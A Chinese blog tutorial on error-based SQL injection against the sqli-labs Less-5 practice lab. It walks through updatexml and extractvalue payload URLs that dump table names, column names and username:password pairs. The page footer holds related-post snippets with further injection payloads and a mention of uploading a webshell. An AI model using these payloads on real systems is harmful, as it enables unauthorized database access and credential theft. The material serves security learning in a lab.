SQL注入类型——报错注入

已于 2023-11-06 19:43:56 修改
阅读量56 收藏
点赞数
文章标签: sql 数据库
于 2023-11-06 11:55:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45821518/article/details/134241078
版权

报错注入步骤:

  1. 求闭合字符
  2. 爆数据库名
  3. 爆表名
  4. 爆列名
  5. 爆字段

联合查询是最简单有效的方法,当联合查询不可用时,在注入字符后,出现语法报错,可以尝试报错注入:

  1. 找到注入字段

http://localhost/sqli-labs/Less-5/?id=1

  1. 分析注入方式

http://localhost/sqli-labs/Less-5/?id=1’

http://localhost/sqli-labs/Less-5/?id=1’ and updatexml(1,concat(1,(select table_name from information_schema.tables where table_schema=‘security’)),1)–+

  2. 11
  3. 1
  4. 1
  5. 11
  6. 1
  7. 1

网页没有显示位时,联合查询不可用:
没有显示位

出现语法报错

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(username,":",password) from users)),1)--+

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 1,1)),1)--+

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 2,1)),1)--+

在这里插入图片描述

http://localhost/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(1,(select username from users limit 2,1)))--+

在这里插入图片描述

yes&no.
关注
复现awvs——sql注入漏洞(报错注入加时间盲注)
记录并分享学习安全的知识点..
03-12 3338
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保。 一、sql注入介绍及分类 sql 注入就是一种通过操作输入来修改后台操作语句达到执行恶意 sql 语句来进行攻击的技术。 按变量类型分: • 数字型 • 字符型 按 HTTP 提交方式分 • GET 注入 • POST 注入 • Cookie 注入 按注入方式分 • 报错注入 • 盲注 • 布尔盲注 • 时间盲注 • union 注入 编码问题 • 宽字节注入 二、awvs扫描结果 .
sql注入——报错注入
heyingcheng的博客
03-05 218
两个无加区别:后台对于输入输出的合理性没有做检查。
SQL手工注入——报错注入利用
gam0n的博客
08-28 722
利用数据库的BUG进行利用,看报错信息,不过报错的信息就是我们想要的信息。 只要是count() rand group by 三个连用就会造成这种报错。 count用于判断数据库或表的数量,rand用于生成一个随机数,group by用于以什么为一组进行分组。 至少要有三条数据 才有可以产生报错注入。 floor(rand(0)*2))一定报错 语句: sele...
SQL注入--报错注入
weixin_44940180的博客
07-28 283
利用floor(rand(0)*2)报错返回信息 一、 报错原理 二、通用格式 ?id=1 union select (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a) //将payload插入即可 三、利用报错返回信息 返回数据库名称、版本信息、用户名称 // payload (select concat
SQL注入---报错注入
qq_41592307的博客
09-03 333
报错注入 1、报错注入的原理 由于后台没有对报错信息进行过滤,报错信息会显示在前端,可以使用指定的函数来制造报错,由 此来获取数据信息。 2、报错函数 extractvalue(xml_frag,xpath_expr):对XML文档数据进行查询的XPATH函数 如果Xpath的输入错误,则会将错误信息结果显示在前端。 注:extractvalue()和updatexml()函数查询的最大长度为32位,如果超过32位则需要使用 substring()函数截取 ...
初学Web安全之sql注入(二)——报错注入
weixin_47531846的博客
11-20 696
知识补充: 前一篇提到了如何判断字符型与数字型以及字符型的闭合,不过在做sqli-labs靶场时,出现了id=(‘1’),甚至还有id=((‘1’))这样双括号包裹的,在这里笔者也是没想到,不过正常来说,开发人员是不会使用这种的,所以前篇提到的单引号双引号判断法,还是有用的。 其实页面有回显,判断出数字型以及字符型还有闭合,还是相对简单的,下面拿靶场举列 上图,我们将报错信息拿出来分析一下: ''1'' LIMIT 0,1' 将最外面的包裹引号去掉: '1'' LIMIT 0, 不难看出,我们输
sql注入初学——松风1
08-03
本文将深入探讨SQL注入的基本概念、检测方法以及针对不同数据库类型的识别技术。 首先,让我们从基础开始。在URL中,如`http://www.example.com/xxx.php?id=4`,如果直接在参数`id`后添加一个单引号 `'`,如`...
sql注入——sqlserver报错注入
cxrpty的博客
02-12 6000
该注入的条件是必须有报错信息 用到函数convert(int,(select top 1 db_name() )),其含义是将第二个参数的值转换成第一个参数的int类型 一、打开文件,如下图所示,有报错信息: 二、查看数据库 输入:http://192.168.1.106/1.php?id=1 and 1=convert(int,(select top 1 db_name()));这里...
渗透测试——报错注入
zjdda的博客
05-20 893
1.报错注入原理 由于后台没有对数据库的信息做过滤,会输出到前台显示,那么我们就可以通过制造报错函数,将查询语句带入到数据库中,以报错信息显示出来。 2.报错注入漏洞产生的条件 1)参数用户可控:前端传入的参数内容由用户控制 2)参数带入数据库的查询:传入的参数拼接到 SQL 语句,并且带入数据库的查询 3)对用户输入的数据没有做合法性的判断 4)后台对数据库的信息没做过滤,会输出到前台显示 3.常用哪些函数来制造爆错? extractvalue\updatexml\floor\exp 4.updatex
sqlalchemy JSON 字段写入时中文序列化问题
llc的博客
09-12 396
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
经典sql题(一)求连续登录不少于三天用户
m0_58076578的博客
09-14 868
去重提取日期查询:提取每个用户的唯一登录日期。结果表table1:显示每个用户的唯一日期。为每个用户生成序列号查询:为每个用户的日期生成序号,并计算date2。结果表table2:显示用户的日期和对应的date2。步骤使用函数,按照日期顺序为每个用户的登录日期分配一个序号。例如,对于用户 ID = 1,假设他们的日期是2023-10-012023-10-02和2023-10-03将为它们生成序号 1、2 和 3。date2是通过将每个日期减去它的序号得到的。这个操作的目的是为了检测连续的日期。
mysql学习教程,从入门到精通,SQL 更新数据(UPDATE 语句)(17)
最新发布
qq_45746668的博客
09-17 748
SQL `UPDATE` 需要指定要更新的表、要修改的列以及新值,并且通常会通过`WHERE`子句来指定哪些行需要被更新。下面是一个简单的示例,说明如何使用`UPDATE`语句。
CISP-PTE CMS sqlgun靶场
2301_81525518的博客
09-13 644
输入 -1' union select 1,2,3# 有回显可以查看数据库sql靶场有个搜索框先点一下go,有回显说明存在漏洞。查询它的数据这里admin用户的密码是md5加密。有个phpinfo.php点进去可以看到路径。然后扫描ip目录发现没有后台登录的地方。然后在这里尝试sql注入。来到根目录有个flag。然后查询数据库,用户。
java面试题-Sql 语句的执行顺序
qq_36178165的博客
09-13 517
Sql 语句的执行顺序
Sybase「退役」在即,某公共卫生机构如何实现 SAP Sybase 到 PostgreSQL 的持续、无缝数据迁移?
Tapdata 技术博客
09-13 1058
Sybase 暂停维护在即,某公共卫生机构提出了将其关键业务数据从中平稳迁移到 PostgreSQL 的需求。该如何安全、高效实现?
sqlgun靶场漏洞挖掘
A2893992091的博客
09-13 251
找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径。于是乎,尝试使用sql注入的方式,上传一句话木马。搜索框输入以下代码,验证是否存在xss漏洞。写入成功,蚁剑连接大脑,cmd代替思考。此处密码为MD5加密,解码内容如下。经过测试,输入框存在SQL注入漏洞。根据设定的地址访问上传的文件。OK了,存在xss漏洞。
经典sql题(九)SQL 查询详细指南总结二
m0_58076578的博客
09-17 527
这些步骤展示了 SQL 查询如何逐步处理数据,应用过滤、分组、排序和限制操作,最后返回所需结果。为了演示这条 SQL 查询的执行,可以先定义数据库表架构并插入一些示例数据。结果与 ORDER BY 相同,因为只有 3 行。在这个例子中已经处理。
【乐吾乐大屏可视化组态编辑器】API接口文档(pgsql
le5le_iot的博客
09-13 1103
采用前后端分离架构,乐吾乐后端服务提供一整套完整的web组态编辑器的所有数据接口,包含2D/3D图纸接口服务、文件接口服务和用户接口服务等,安装包版本提供后端可执行程序文件,后端源码版提供Java源码。
sql注入教程:报错注入与二阶攻击策略
本篇自学笔记详细探讨了SQL注入中的一个重要技术手段——报错注入报错注入利用的是Web应用程序中未关闭或过滤错误处理功能的情况,攻击者通过构造恶意SQL语句,迫使服务器在执行时返回错误信息,从而间接获取敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值